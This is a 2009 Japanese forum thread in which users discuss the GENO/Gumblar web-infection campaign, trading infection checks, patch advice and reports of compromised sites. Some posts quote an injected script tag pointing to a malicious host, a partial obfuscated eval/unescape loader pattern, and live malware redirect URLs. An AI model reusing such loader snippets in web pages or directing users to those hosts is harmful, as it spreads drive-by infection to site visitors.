
これで核級のウイルスがきても全部シャットアウト
321名無しさん@お腹いっぱい。:2009/09/23(水) 04:35:30
win2000でavastで削除してsqlsodbc.chmを消去して
その後また復元してなければ大丈夫?
322名無しさん@お腹いっぱい。:2009/09/23(水) 05:03:28
>>320
全部はシャットアウトできない
砂箱にもUACにもどうせ穴がある
323名無しさん@お腹いっぱい。:2009/09/23(水) 21:25:32
アーモー大騒ぎ
324名無しさん@お腹いっぱい。:2009/09/24(木) 12:53:16
ウィルスバスターでGENOウィルスが隔離されていました。
まとめサイトにある確認法で調べたら、
cmdの値?が正常ではなく、低いままでした。
まだ感染しているということでしょうか?
325名無しさん@お腹いっぱい。:2009/09/25(金) 00:07:07
一度感染したという事は既にシステムがぼっこボコにされている可能性が高いから
クリーンインストールした方がいいと思うんだ。
326名無しさん@お腹いっぱい。:2009/09/25(金) 15:25:28
>>325
システム?もやられるのか?
俺もavastで知らぬうちに削除してて(たぶん)その後、変な挙動はないのだが
327名無しさん@お腹いっぱい。:2009/09/25(金) 16:12:13
>>326
カスペとかノートンのオンラインスキャンして見て検出なければいいじゃね?

オレは精神衛生上の問題でクリーンインストールするけどね
328名無しさん@お腹いっぱい。:2009/09/25(金) 16:13:43
kスペでやったけど問題なかったよ
329名無しさん@お腹いっぱい。:2009/09/29(火) 05:04:20
genoじゃないがサイト巡回してたらノートンのIDセーフ(かなりいい加減)が真っ赤になったから
ソース確認したら本当に埋め込まれててふいたw
activexの脆弱性を突くタイプでvista/firefoxじゃなかったら感染していたんだろうな
330名無しさん@お腹いっぱい。:2009/09/30(水) 12:58:01
萌えミシュラン感染してる

上記サイトのソースの中に
変なURLの記述がある
(.ruのロシアのサイト?)
改竄されたみたい。

管理人が気付いて
「当サイトのトップページが改竄されました」
っていう文章に内容が変わってるけど
それも改竄されて
また別のロシアのサイトのURLが…
331名無しさん@お腹いっぱい。:2009/09/30(水) 15:59:47
そのロシアのサイトのページは空
今のところ無害
332名無しさん@お腹いっぱい。:2009/09/30(水) 16:39:01
と思ったが何かうまくやって
空のページが表示されるときがあるのかもね
無害は取り消し
333名無しさん@お腹いっぱい。:2009/09/30(水) 23:52:30
334名無しさん@お腹いっぱい。:2009/10/01(木) 01:22:48
>>330
行ったことがないサイトだけど報告ありがとう。
335名無しさん@お腹いっぱい。:2009/10/01(木) 08:27:01
今さっきGENOウィルスの存在を知った
片っ端から調べて、うちのPCもチェックしたが、感染してなかった

とりあえず

OS→Vista
ブラウザ→FireFox最新版
セキュリティ→ノートン2009
・Adobeリーダー&フラッシュプレイヤーをアップデート
・Javaスクリプトオフ
・Adobeリーダーのスクリプトもオフ
・今後しばらくネットは可能な限り携帯でカバーする予定

て感じなんだが、なんかまだまずいことある?
5月ごろまでの情報しか探せなかったんだよ…今現在でもこの対策で大丈夫なのか教えてくれ
これだけは調べきれなかったんだ、すまん
336名無しさん@お腹いっぱい。:2009/10/01(木) 09:14:35
Windows updateもしておけ
337名無しさん@お腹いっぱい。:2009/10/01(木) 09:44:15
>>336
サンクス
いまやってる
あとUACもオンに直しておいた

このウィルス自体は今はとりあえず全く動き(新種出たとか)はないと思っていいの?
338名無しさん@お腹いっぱい。:2009/10/01(木) 09:47:45
Vistaには無害
339名無しさん@お腹いっぱい。:2009/10/01(木) 09:53:10
>>338
あれ、俺が見たサイトにはご丁寧にVistaのチェック方法なんて載ってたんだが…
それはなぜなんだぜ?無害なら必要なくね?
純粋に疑問
340名無しさん@お腹いっぱい。:2009/10/01(木) 09:57:18
用心しろってことじゃね
無害だよ
GENO自体はもう見ないけど
似たような物もあるし用心はしておいた方が良いってことじゃね
341名無しさん@お腹いっぱい。:2009/10/01(木) 10:08:43
>>340
ありがとう
今ざっと調べてきたが、「今のところ無害だが油断はできない」みたいだな

ひとまず落ち着いてはきたんだな
これをいい機会に気をつけるわ
本当助かった
皆ありがとう
342名無しさん@お腹いっぱい。:2009/10/02(金) 01:10:52
初期にはvistaでもウィルスにかかってた人がいたからな。UACを切ってたせいで。
だからまぁ、vistaでもたまにはsqlsodbc.chmのファイルサイズが
50,727 バイトであることを確認しておくのも悪くない。
343名無しさん@お腹いっぱい。:2009/10/02(金) 01:16:51
それは嘘だろ
344名無しさん@お腹いっぱい。:2009/10/02(金) 01:24:12
vistaが安全かどうかに関係なく
GENOはVistaやServer2008は最初から除外してる
UACは無関係
感染は嘘
345名無しさん@お腹いっぱい。:2009/10/02(金) 17:38:58
UAC無効だとGENO”以外”での似たような構造を持ったウィルスの感染例はあるな
GENOそのものはXPを切り捨てるだけでOK
346名無しさん@お腹いっぱい。:2009/10/02(金) 22:42:50
>>338

UACをOFFしてあるならアウト
あちこちの初心者サイトでOFFにするおすすめが載っている現状で
その結論は危険
347名無しさん@お腹いっぱい。:2009/10/02(金) 22:44:59
何を言ってるんだ君は
348名無しさん@お腹いっぱい。:2009/10/02(金) 22:56:17
適当な糞アフィサイトに騙されとる
349名無しさん@お腹いっぱい。:2009/10/02(金) 23:04:19
なんか勘違いする人もいそうなので
>>346
Gumblarはたはgenoウイルス と呼ばれる物について話してる
これに関してはVistaは対象外ということ
Vistaが他の攻撃に安全と言ってるわけではない
350名無しさん@お腹いっぱい。:2009/10/10(土) 13:08:04
イラストサイトの
Pafe Cafe
http://red.sakura.ne.jp/~izumi/
感染してた。(現在は対策済み)

Googleキャッシュにはもう残ってないが
百度のキャッシュには残ってた。

HTMLのソースコードはavastで
HTML:Illiframe-C [Trj]として反応

http://soul-of-man.ru:8080/index.php
(IPアドレス:85.17.138.27)
に飛ばそうとしてたみたい。

萌えミシュランが感染した時も
いくつかのサイトに飛ばそうとしてたが、
その中に85.17.138.27もあったと記憶している
351名無しさん@お腹いっぱい。:2009/10/10(土) 21:24:17
>>350
脆弱性が使われてたの?
352名無しさん@お腹いっぱい。:2009/10/11(日) 22:48:16
>>351
上のサイト(.ruドメインの方)に
アクセスすれば
脆弱性を付く不正なPDFファイルとか
不正なフラッシュファイルとか
ダウンロード出来ると思う。

アクセスしたくないけど。

そういうサイトに無理矢理、強制で
誘導しようとしてた。
353名無しさん@お腹いっぱい。:2009/10/12(月) 06:23:50
>>352
恐ろしいな。
既存の脆弱性ならいいんだけどね。
354名無しさん@お腹いっぱい。:2009/10/18(日) 23:37:04
GENOウイルス感染したかも・・・。
ヤバイと思ってPC電源切っちゃったあと
起動しようとしてもPC再起動繰り返す
(多分ブルースクリーン)ようになったから
もう確認のしようがないけど。

何か勝手にアドビリーダー開いたり
謎のtmpファイルを勝手に開こうとしたり
コマンドプロンプトで一瞬何かやってたので
GENOウイルスで間違いないと思う。

どうやってデータ復旧しようか考え中。
355名無しさん@お腹いっぱい。:2009/10/18(日) 23:40:43
>>354
あらかじめ対策ってとってましたか?
もし、とってても感染したなら焦るのでよければ教えてケロ。
356名無しさん@お腹いっぱい。:2009/10/18(日) 23:47:25
>>355
GENOウイルスの存在自体知らなかったので対策はとってませんでした。
ただAdobeReaderとIEのFLASHは9月中に一回アップデートしていました。
しかし今回はOperaを使ってHP閲覧してて、
IEのFLASHはアップデートしててもOperaのFLASHは古いまま
だったのが敗因のようです。
357名無しさん@お腹いっぱい。:2009/10/18(日) 23:57:07
>>356
d
他スレでまた活動始めたなんて話も聞くので、
新たな対策が必要なのかな、と少し焦りました。

adobeは最近頻繁にうpデートするから注意必要ですね。
データ復旧マンドクサだろうけど、がんばってケロ。
358名無しさん@お腹いっぱい。:2009/10/19(月) 00:02:53
>>356
Readerの最新は10月14日だからそれもアウトだね。
359名無しさん@お腹いっぱい。:2009/10/19(月) 00:13:19
他スレに貼ったやつだけど貼っとく
今回はMS09-043あたりもからんでるみたいだからMicrosoft Updateもしてね

対策
・MSUpdateをする
 http://www.update.microsoft.com/microsoftupdate/v6/default.aspx?ln=ja
・Adobe Reader(Acrobat, Acrobat Reader)を使ってないならアンインストール
 使ってる場合は9.2.0に更新
 インストールの有無はプログラムの追加と削除から確認
 DLサイト
 http://get.adobe.com/jp/reader/
・Adobe Flash Playerの更新(動画サイト見てるなら絶対入ってる)
 最新は10.0.32.18
 確認はこれ
 http://www.adobe.com/jp/software/flash/about/
 DLサイト
 http://get.adobe.com/jp/flashplayer/
360名無しさん@お腹いっぱい。:2009/10/19(月) 00:16:01
Flash PlayerはIEとそれ以外で違うよってのも追記だな
361名無しさん@お腹いっぱい。:2009/10/19(月) 00:36:11
Adobe ReaderもAdobe Flash Playerも削除したよオレ。
どうせ使わないし。
362名無しさん@お腹いっぱい。:2009/10/19(月) 02:01:29
2009.10.18 日曜日 (手抜き版)
http://www3.atword.jp/gnome/2009/10/18/oct-18-09-sun-rapidly/
Gumblar strikes back?
[EMERGENCY]
先日、さまれぼ!管理人様より警報を受け取っていたのですが、Gumblarに強いScanSafeも警報を発しました。
Gumblar Website Botnet Awakes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
sqlsodbc.chm
という、悪夢のキーワードをもった Gumblar(GENO/zlkon/Martuz/JSRedir-R/Daonol)が、蠢動を再開した模様です。

現時点で使用されている脆弱性は
MS09-043 : Microsoft Office Web コンポーネントの脆弱性により、リモートでコードが実行される (957638)
という、9月に塞がれたものですが、それ以外にも脆弱性攻撃を仕掛けてくる可能性がありますので注意が必要です。

※マイクロソフト セキュリティ情報 MS09-043 - 緊急
http://www.microsoft.com/japan/technet/security/bulletin/MS09-043.mspx
363354:2009/10/19(月) 02:59:26
お騒がせしました。
感染したHDDを他PCに取り付けてウイルスチェックしたところ、
GENOウイルスではなかったようです。
何らかのサイトを見たことによってAVCareというソフトが
インストールされてしまったようです。
(いかがわしいサイトではありません。遊戯王のCDについて
調べていたときに起きた出来事です。)

他にもトロイが2、3個検出されていましたが、
いずれもGENOウイルスとは関係ないようでした。

症状が似ていた理由は不明ですが、sqlsodbc.chmの
ファイルサイズが正常だったことから見ても
GENOウイルスの感染ではなかったようです。

しかし、HPを見るときに注意することに越したことは
ないみたいですね。もしかしたら似た仕組みで
インストールされたのかもしれないので・・・。
364名無しさん@お腹いっぱい。:2009/10/19(月) 03:23:48
>>363
最新版のGeno亜種は検出できるの少ないみたいだから無いとは言い切れないよ
つーかそんだけいろいろ感染してた状態ならOS入れなおしたほうがいい
365名無しさん@お腹いっぱい。:2009/10/19(月) 07:33:35
今回のはC:\になんとか.bakってのを常駐させるくさ
(ファイル名ランダム)。
366名無しさん@お腹いっぱい。:2009/10/19(月) 10:55:17
再襲来したGENOウイルスについて報告してるブログみつけた。
ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html
ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html
ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html

zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、
今度のスクリプトだと陥落した別サイトで撒いてるから、
従来のチェッカーじゃ判別できないな。
367名無しさん@お腹いっぱい。:2009/10/19(月) 13:03:32
糞通販ショップGeno ウイルス再び
http://tsushima.2ch.net/test/read.cgi/news/1255886283/
368名無しさん@お腹いっぱい。:2009/10/19(月) 13:09:47
今回もAvastはスクリプトを検知出来るようだ。
369名無しさん@お腹いっぱい。:2009/10/19(月) 13:27:45
>>368
いくつかパターンがあるみたいだけどそのうち1つは反応した
もう1つはスルー
他はわからん
370名無しさん@お腹いっぱい。:2009/10/19(月) 13:45:01
>>366
チェッカーは知らんけど挿入位置は同じっぽいな
371名無しさん@お腹いっぱい。:2009/10/19(月) 14:10:55
もう少し詳しく挙動を解説したブログ
ttp://ilion.blog47.fc2.com/blog-entry-154.html

ウイルスをホスティングしてる改竄サイトが無数にあるわけだ。
もぐら叩きだな、これじゃ・・・
372名無しさん@お腹いっぱい。:2009/10/19(月) 14:16:15
感染してるサイトのurlをチェッカーに突っ込んでみたが、危険度0.5%
でスルーされた。
373名無しさん@お腹いっぱい。:2009/10/19(月) 14:18:24
あんなの誰も使ってないだろ
374名無しさん@お腹いっぱい。:2009/10/19(月) 15:11:31
今回のはだめだ…HTMLソースにこれあったら確実にアウト、みたいなルールが作れねぇ。
375名無しさん@お腹いっぱい。:2009/10/19(月) 15:38:50
何したいんだかわからんけど>>366見た感じこれでよくね
.php ></script><body>

PHPファイルも見れるならこんな行があるか見るとか
eval(unescapse(*.replace(/[*]/g,*)));

だいたいこんなパターンでそ
//<script>
try{if(hoge='適当な文字')throw new TypeError('');}catch(){}
moge='難読化コード';
eval(unescapse(hoge.replace(/[huga]/g,hoge)));
ここに何かあるときもある
//</script>
376名無しさん@お腹いっぱい。:2009/10/19(月) 15:40:18
.php ></script><body>
これじゃ有害とは断定できねーべ
踏み台側のを拾いに行くのも正直めんどい
377名無しさん@お腹いっぱい。:2009/10/19(月) 16:08:02
何したいのかわからん
誤爆率そこまで高くないと思う
まったくないわけじゃないだろうけど
ローカルでやるには気にするほどではないレベル
378名無しさん@お腹いっぱい。:2009/10/19(月) 20:22:44
ttp://www.ripping.org/

某スレでこのスレが紹介されていたので来ました
上記サイトなんですが、検索エンジン(google)の結果の地点で警告が出るのですが
サイト上に何か仕込まれているんでしょうか?
一見、何の変哲もないPC関係のサイトのように見えますがブラウザレベルでもブロックをくらうようです
379名無しさん@お腹いっぱい。:2009/10/19(月) 20:51:24
「今は」特に何もないけど。
380名無しさん@お腹いっぱい。:2009/10/19(月) 20:57:50
>>378
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?hl=ja&site=http://www.ripping.org/
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
不正なソフトウェアは t-age●ru/ を含む 1 個のドメインでホストされています。

この結果を使用しているFirefox、Chromeで見るとアウト判定になる

いまは見た感じなさそうだけど、攻撃スクリプトを誰が削除したのかわからないから
うかつに見ないほうが良いだろうね
381名無しさん@お腹いっぱい。:2009/10/19(月) 21:22:30
>>379,>>380
大変参考になります
有難う御座いました
382名無しさん@お腹いっぱい。:2009/10/20(火) 14:59:19
セキュリティホールmemo
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2009/10.html#20091020

リンクだけだけど、大御所来た。これでボンクラ鯖管も注意を払うといいが…
383名無しさん@お腹いっぱい。:2009/10/20(火) 22:39:31
>>382
おっかないから
「aguseゲートウェイ(代理読み込み)」
http://gw.aguse.jp/
を使って見てきた俺ガイル orz
384名無しさん@お腹いっぱい。:2009/10/21(水) 01:16:42
>>383
石橋を叩いて人に渡らせる行為をなにも恥じることはあるまい。
385名無しさん@お腹いっぱい。:2009/10/21(水) 03:43:01
334 名前:GENO 投稿日:2009/10/20(火) 17:13:09 ID:pXNvHr1I0
ここ見てあちこちGENOスレ回ってきたら

> 感染したまま放置されてたサイトや、
> 対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・

マジすか・・・


335 名前:GENO 投稿日:2009/10/20(火) 17:24:34 ID:mGYwobiA0
>>334
マジです。

たとえばGenoVirus感染サイトリストに出てる「対策済み」サイトの中にも、
再感染してるのがある。
もっと言えば、告知なしで再開してるサイトの一部。
告知なしで再開して、再感染したところは、
管理者が根本的な対策(OSの再インストール→サイトの復旧)を
やってなかった(自分のPCの感染に気づいていない)んでしょう。。。
386名無しさん@お腹いっぱい。:2009/10/21(水) 12:41:35
ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html
JRAレーシングビュアーでサイト改ざん ウイルス感染の疑い(2009.10.21)

株式会社中央競馬ピーアール・センターは20日(火)、
JRAレーシングビュアーの一部ページが一時改ざんされ、
改ざんされた期間中にサイトを閲覧した会員が
ウイルスに感染した疑いがあると発表した。

サイト改ざんされた疑いのある期間は
15日(木)18時から20日(火)13時までの間。
この期間中に悪意のあるコードがサイト内に埋め込まれ、
サイトを閲覧すると
"Gumblar"または"JSRedir-R"
(通称「GENOウイルス」とも呼ばれる)
に感染する可能性が生じたとのこと。
サーバー管理会社に調査依頼の上、
現在はこの悪意のあるコードはすべて除去され、
ウイルス感染の心配はないとのこと。
またこのサイト改ざんによる
個人情報の流出はないとのこと。
387名無しさん@お腹いっぱい。:2009/10/21(水) 21:36:08
なぜこういうのをAdobeが作らないのか…。

Adobeの“Flash”と“Reader”のアップデートを半自動化「Flash_Reader_Update」
http://www.forest.impress.co.jp/docs/review/20091020_323014.html
388名無しさん@お腹いっぱい。:2009/10/21(水) 22:02:37
>>386
レーシングビュアーは会員向けの有料サービスなのか
ホームページには普通にアクセスしてたからビビったけど
とりあえず害は及ばずといったところか
しかしJRAがGENOウイルスとハッキリ認識しているとは
GENOの知名度って想像以上に高いなあ
389名無しさん@お腹いっぱい。:2009/10/22(木) 00:07:15
>>387
これはいい
390名無しさん@お腹いっぱい。:2009/10/22(木) 10:14:21
おれ素人だけどGENO見終わって閉じようとしたら何回やってもだめで
怖くなって電源切った。これだったのかウィルスソフトはいれてますが。
391名無しさん@お腹いっぱい。:2009/10/22(木) 10:20:43
何の責任も負わない個人が作ったものだし、
作者がその気になれば偽物をDLさせられて泣きを見るだけだろ。
392名無しさん@お腹いっぱい。:2009/10/22(木) 10:36:26
>>391>>387に対してのものか
だからこそ
>なぜこういうのをAdobeが作らないのか…。
個人ではないベンダーに期待を寄せるような
コメントが書き添えられているのではないか
393名無しさん@お腹いっぱい。:2009/10/22(木) 11:07:29
なぜも何も自動でアップデートするようになってるだろ
394名無しさん@お腹いっぱい。:2009/10/22(木) 12:59:55
えっ
395名無しさん@お腹いっぱい。:2009/10/22(木) 13:43:23
Genoウイルス(Gumblar)検出状況
http://slashdot.jp/~pluto/journal/491348
このphpファイルは見に行くたびに変わりますが、
カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。
396名無しさん@お腹いっぱい。:2009/10/22(木) 16:36:03
>>390
ウイルスはいれちゃだめよ
397名無しさん@お腹いっぱい。:2009/10/22(木) 16:43:00
>>394
えっじゃねえよ
頭使えよ
398名無しさん@お腹いっぱい。:2009/10/22(木) 17:54:51
頭使うもなにも
自動でアップデートとか初耳なんだが
設定しだいで出来るってことなのか?
399名無しさん@お腹いっぱい。:2009/10/22(木) 18:24:49
正確にはアップデート確認か
求めてることは同じだろ
400名無しさん@お腹いっぱい。:2009/10/22(木) 18:32:16
Flashはアップデートの確認
Readerはアップデートまで自動でやってくれるね
401名無しさん@お腹いっぱい。:2009/10/22(木) 19:00:56
そんなに自動が好きなのか
402名無しさん@お腹いっぱい。:2009/10/22(木) 19:06:22
何を言ってるんだ君は
403名無しさん@お腹いっぱい。:2009/10/22(木) 19:24:01
Readerはたしか環境設定のアップデータの項目に
自動にするしないの選択項目があってわかりやすいよ
ただしこれは最新版の場合ね

それより前のバージョンだと、環境から一般いってそこに
アップデートについての選択項目があったと思う
404名無しさん@お腹いっぱい。:2009/10/22(木) 20:46:41
>>386
しかしJRAが感染してたのに騒ぎにもならないとは
もう、みんな対策を済ませてたのか
そんなはずはないな
GENOウイルス自体に、もう関心がなくなってるのか
405名無しさん@お腹いっぱい。:2009/10/22(木) 20:51:40
前回の時も全然ニュースにならなかったよ。
分かり難い害だから話題にしにくいんじゃない?
406名無しさん@お腹いっぱい。:2009/10/22(木) 20:56:08
”みんな”はウイルス自体に関心がないからな・・・
認知されるのはいつも通り被害が十分に行き渡ってからだろ
407名無しさん@お腹いっぱい。:2009/10/22(木) 20:57:22
ヤフーに乗ったのもずいぶんたってからだったしな
408名無しさん@お腹いっぱい。:2009/10/22(木) 21:24:11
ひきこもり共和国という交流サイトがやられた模様。
http://love6.2ch.net/test/read.cgi/hikky/1221915065/827-
409名無しさん@お腹いっぱい。:2009/10/22(木) 23:05:01
>>404
馬券買ってるおっさん世代はウイルスなんて知らんのじゃないか?
410名無しさん@お腹いっぱい。:2009/10/22(木) 23:29:17
馬券買うってことは金銭とか扱うだろうしJRA早いとこ対策しないとまずいんじゃ
411名無しさん@お腹いっぱい。:2009/10/23(金) 16:38:02
JRAまじかよーorz
ノンスクリプト許容してるサイトなのにorz
412名無しさん@お腹いっぱい。:2009/10/23(金) 16:41:02
こんなとこ来るような人なら実害ないだろ
413名無しさん@お腹いっぱい。:2009/10/23(金) 16:55:48
>>411
JRA確認してないんでわからんけど、通常であれば
外部ドメインにしこまれてたはずだよ
全許可ならダメだけど見知らぬドメインは許可されてなかったんじゃないかな
414名無しさん@お腹いっぱい。:2009/10/23(金) 17:06:08
OSがvista以降なら問題ない
415名無しさん@お腹いっぱい。:2009/10/23(金) 17:11:43
ガンブラさんは今月で3つも確認
いずれも個人サイト
416名無しさん@お腹いっぱい。:2009/10/23(金) 17:44:54
JRAの潔い態度に感動したです
GENOも、これくらい堂々としてたら…
417名無しさん@お腹いっぱい。:2009/10/24(土) 02:41:16
【セキュリティ】「GENO」に酷似したウイルスが流行の兆し、国内60サイトで感染確認(09/10/23)
http://pc11.2ch.net/test/read.cgi/pcnews/1256299220/

GENOウイルスに類似したあらたな攻撃が発生 
http://tsushima.2ch.net/test/read.cgi/news/1256287835/
418名無しさん@お腹いっぱい。:2009/10/24(土) 15:26:49
419名無しさん@お腹いっぱい。:2009/10/24(土) 18:15:02
ここに出入りしているのは、ちゃんとupdateしているような奴ばかりだから情報が集まらないな。
もっとレベルの低いところじゃないと。。
420名無しさん@お腹いっぱい。:2009/10/24(土) 18:37:25
Gumblar類似のDaonolが広がってるみたい
全国でPCが起動しなくなるトラブルが多発。PC初心者の多い富士通サポセンがパンク状態 
http://tsushima.2ch.net/test/read.cgi/news/1256308562/

黒い画面にマウスカーソル (Win32/Daonol)
http://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
421名無しさん@お腹いっぱい。:2009/10/24(土) 18:41:03
>>420 DaonolとGumbarの因果関係は現時点では不明というか
憶測の域じゃないのか
422名無しさん@お腹いっぱい。:2009/10/24(土) 18:57:23
>>421
ウイルス名は各ベンダーが好き勝手に付けてるから。Daonol=Gumblar。
ttp://internet.watch.impress.co.jp/cda/special/2009/05/21/23523.html
>なお、このウイルスは「Gumblar」という名称以外にも、
>Symantecでは「Infostealer.Daonol」、
>マイクロソフトでは「Win32/Daonol.F」、
>Kasperskyでは「Trojan-Dropper.Win32.Agent.apfn」といった名称が付けられている。
423名無しさん@お腹いっぱい。:2009/10/24(土) 19:07:51
>>422 サンクス。ようやくわかった。
ていうか大昔にウイルスの名前をベンダー間で統一しようって言ってたんじゃないのかよ。。
424まとめ:2009/10/24(土) 19:51:00
Genoウイルス(Gumblar)再び
ttp://slashdot.jp/submission/36590/GenoGumblar

■「Gumblar」酷似ウイルスが流行の兆し、国内60サイトで感染確認
ttp://internet.watch.impress.co.jp/docs/news/20091023_324076.html

黒い画面にマウスカーソル (Win32/Daonol)
ttp://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx

JRAレーシングビュアーでサイト改ざん ウイルス感染の疑い(2009.10.21)
ttp://www.weekenddream.jp/keiba_news/cat70/20091021_1.html

「Gumblar」の脅威再び―Kaspersky が警告
ttp://japan.internet.com/webtech/20091023/4.html
Gumblar に酷似、新たな脅威発生に警告
ttp://www.kaspersky.co.jp/news?id=207578788

ウイルス・セキュリティ情報 | dynabook.com サポート情報
コンピュータウイルス「Torojan.Win32/Daonol.H」について
ttp://dynabook.com/assistpc/info/20091022.htm

コンピュータウイルス「Win32/Daonol」に関するご注意
ttp://supportapj.dell.com/support/topics/topic.aspx/jp/shared/support/news/2009/20091022?c=jp&l=ja&s=gen
425名無しさん@お腹いっぱい。:2009/10/24(土) 23:47:55
ttp://cycle-world.jp/
ここも?
426名無しさん@お腹いっぱい。:2009/10/24(土) 23:52:36
>>425
ぽいね
427名無しさん@お腹いっぱい。:2009/10/24(土) 23:52:59
>>425
やられてるね
あと、URLを書くときは“.”を“●”などに置き換えて
428名無しさん@お腹いっぱい。:2009/10/24(土) 23:58:21
スタッフブログの方は無事っぽ
普通に毎日更新で見てるっぽいし教えるべきかな?
429名無しさん@お腹いっぱい。:2009/10/25(日) 00:00:25
がっつり逝ってる
ワロス
430名無しさん@お腹いっぱい。:2009/10/25(日) 00:09:23
何のサイト?
さすがに踏みたくない
431名無しさん@お腹いっぱい。:2009/10/25(日) 00:11:26
西日本最大級オートバイ用品専門店らすぃ
432名無しさん@お腹いっぱい。:2009/10/25(日) 00:13:13
>>431
ありがとう
433名無しさん@お腹いっぱい。:2009/10/25(日) 00:14:39
<script src=*****mages/index.php ></script>
の部分がそうか?
繋がんないけど
434名無しさん@お腹いっぱい。:2009/10/25(日) 00:16:44
サイトも店の色も派手なツートンなんでドンパチよろしいんじゃないんでしょーか
435名無しさん@お腹いっぱい。:2009/10/25(日) 00:20:14
>>433
スクリプトだけ書いてあるページに飛ばされるっぽいが…
ソースチェッカーで見たのでレイアウトは知らん

スタッフブログ※欄に凸っていいのか?
だが何を書いたらいいのかよくわからんので
詳しい人がやってくれるならお願いしたいが
436名無しさん@お腹いっぱい。:2009/10/25(日) 00:21:34
>>433
接続2回目は拒否られるよね
調べ回避の手段っぽいわ
437名無しさん@お腹いっぱい。:2009/10/25(日) 00:25:36
やっぱVistaだと無効なんだな
もちろん7もだろうけど
438名無しさん@お腹いっぱい。:2009/10/25(日) 00:33:03
>>428
24日土曜も更新してるね
余裕っすね
439名無しさん@お腹いっぱい。:2009/10/25(日) 00:33:47
これはXPから7へ移行させようとするマイクロソフトの陰謀だったんだよ!!
440名無しさん@お腹いっぱい。:2009/10/25(日) 00:34:56
ΩΩΩ<な(ry

まぁ実際問題7がびす太ほどアレじゃなければ乗り換えようかと思ってるがな
441名無しさん@お腹いっぱい。:2009/10/25(日) 00:37:41
vistaでもUAC切ってたらマズイんだよな?
やかましいから切ってるけど
442名無しさん@お腹いっぱい。:2009/10/25(日) 00:39:48
スタッフ写真無くて(´・ω・) ツマンナス
443名無しさん@お腹いっぱい。:2009/10/25(日) 00:45:37
>>441
この件に関してはUACは関係ない
もちろん有効にしておいた方がより安全だが
444名無しさん@お腹いっぱい。:2009/10/25(日) 01:45:52
結局だれも教えに行ってないのかバロス
445名無しさん@お腹いっぱい。:2009/10/25(日) 01:52:26
管理者様

急啓
ていへんだぁていへんだぁ
おたくのサイトがていへんだぁ
顧客に毒盛り、ていへんへんだぁ
              かしこ


FAX番号わかったけど(´・ω・) ツマンナス
446名無しさん@お腹いっぱい。:2009/10/25(日) 02:08:07
ググるとHPのタイトル部分にスクリプトを埋め込まれたのがいっぱいヒットするな、もう無差別攻撃か・・・
447名無しさん@お腹いっぱい。:2009/10/25(日) 02:08:34
http://p-frying●com/

ここも感染してる
ていうか前のGENO騒ぎの時から感染してるっぽい
448名無しさん@お腹いっぱい。:2009/10/25(日) 02:10:06
.は●に変えたがh抜き忘れたorz
449名無しさん@お腹いっぱい。:2009/10/25(日) 02:12:11
この攻撃ってAdobeが脆弱性発表したらすぐに蔓延したんだよな
発表しなかったらこんなことにならなかったかもな
まあそう言うわけにもいかないのかも知れないが
450名無しさん@お腹いっぱい。:2009/10/25(日) 02:29:19
>>446
なにでググってる?
martuzあたり?
451名無しさん@お腹いっぱい。:2009/10/25(日) 02:44:05
木造で中古だと利回りがきつそうで(´・ω・) カワイソス
452名無しさん@お腹いっぱい。:2009/10/25(日) 10:31:32
Avast!のWebシールドが最近の*.phpにも反応するようになった
453名無しさん@お腹いっぱい。:2009/10/25(日) 11:29:45
糞チェッカー
バージョン指定書きで後で後悔するといったのにねえ
さすがアフィ厨
454名無しさん@お腹いっぱい。:2009/10/25(日) 13:25:50
>>425-427
<script src=hxxp://fotothhi.be/images/index.php ></script>

.phpの中身
//<script>
dLLdw=24;if(unescape)dLLdw='';jYCXE=unescape('%'+dLLdw);
〜中(難読化されてたから)略〜
eval(unescape(i0j.replace(/[IlN]/g,jYCXE)));
//</script>
455名無しさん@お腹いっぱい。:2009/10/25(日) 14:17:13
サイトはどうやって改ざんされてるんだ?
456名無しさん@お腹いっぱい。:2009/10/25(日) 14:26:44
>>452
いろいろ試した感じだとIE6なら金曜くらいから拾ってそうな感じだった
他も拾うようになったのかな
457名無しさん@お腹いっぱい。:2009/10/25(日) 14:27:38
>>455
FTP使って改ざんされてます
サーバに攻撃とかそういうのじゃないです
つーかこのへんは前と変わってないはず
458名無しさん@お腹いっぱい。:2009/10/25(日) 14:52:05
>>456
同じサイトの検体でも日が違うと中身が変わって対応状況はバラバラ
今はAvast!とKasperskyの対応がよさそう

2/41 (4.88%)
ttp://www.virustotal.com/jp/analisis/34330a5a110da2ed5f57ee54b7b8df05a8a8d7971e8d898b6f99fe6fb5e6442d-1256440050
5/41 (12.20%)
ttp://www.virustotal.com/jp/analisis/39669ef4eabe7224ff262f678579542e39be15316f4125bd58b74c6c18fb472c-1256440598
459名無しさん@お腹いっぱい。:2009/10/25(日) 16:39:07
何となく思ったのだが

何気に Vista、Windows7 への移行を促そうとする
大人の事情が暗に蠢いていたりとかするのだろうか…
460名無しさん@お腹いっぱい。:2009/10/25(日) 16:43:01
7への移行とアンチウイルス2010年版への移行を促すための業界ぐるみのイベントだろ
461名無しさん@お腹いっぱい。:2009/10/25(日) 17:56:34
>>458
日ごとどころかアクセスするたびにかわるわよ
でも非IEでもAvastが対応してきたようだね
462名無しさん@お腹いっぱい。:2009/10/25(日) 18:08:42
XPの脆さが改めて露呈しただけだろ
463名無しさん@お腹いっぱい。:2009/10/25(日) 18:10:56
Flashのアップデートしてなくてアンチウイルス入れてないやつがたんまり
居るってことだな
MSE普及の一環か
464名無しさん@お腹いっぱい。:2009/10/25(日) 18:22:40
カスペでさっき遮断した
本当に困る
465名無しさん@お腹いっぱい。:2009/10/25(日) 18:30:55
>>463
MSEはおろかノートンやバスターでブロックできんからこれだけ広まってるんだろ
466名無しさん@お腹いっぱい。:2009/10/25(日) 18:34:44
>>463
Flash Playerだけじゃないよ
467名無しさん@お腹いっぱい。:2009/10/25(日) 18:39:31
http://genolists.alink.uic.to/
新種感染サイトのリストはここ使うの?
